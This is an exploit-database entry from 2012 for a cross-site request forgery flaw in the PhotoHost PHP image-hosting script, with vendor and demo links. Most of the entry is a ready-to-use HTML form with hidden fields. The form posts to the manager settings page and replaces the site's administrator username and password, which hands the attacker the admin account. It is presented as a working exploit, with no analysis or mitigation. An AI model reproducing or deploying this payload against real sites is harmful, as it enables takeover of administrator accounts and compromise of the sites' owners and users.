PhotoHost - Run Your Own Image Hosting Service CSRF

2012-03-15T00:00:00
ID 1337DAY-ID-17733
Type zdt
Reporter Jonturk75
Modified 2012-03-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: PhotoHost - Run Your Own Image Hosting Service CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/photohost-run-your-own-image-hosting-service/28803/
# Category::  webapps
# Demo : http://www.ktoolsdemos.net/photohost/mgr
# Greetz: Inj3ct0r Exploit DataBase 1337day.com





<form action="target.com/[PATH]/mgr.index.php?n=1&p_mode=website_settings" name="settings" method="post">
<input type="hidden" style="font-size: 10px; width: 300px;" value="newadminusername" name="mgr_username"/></td>
<input type="hidden" style="font-size: 10px; width: 300px;" value="new admin password" name="mgr_password"/>
<input type="image" src="http://www.draftduel.com/img/submit_button.gif"/>
</form>



#  0day.today [2016-04-20]  #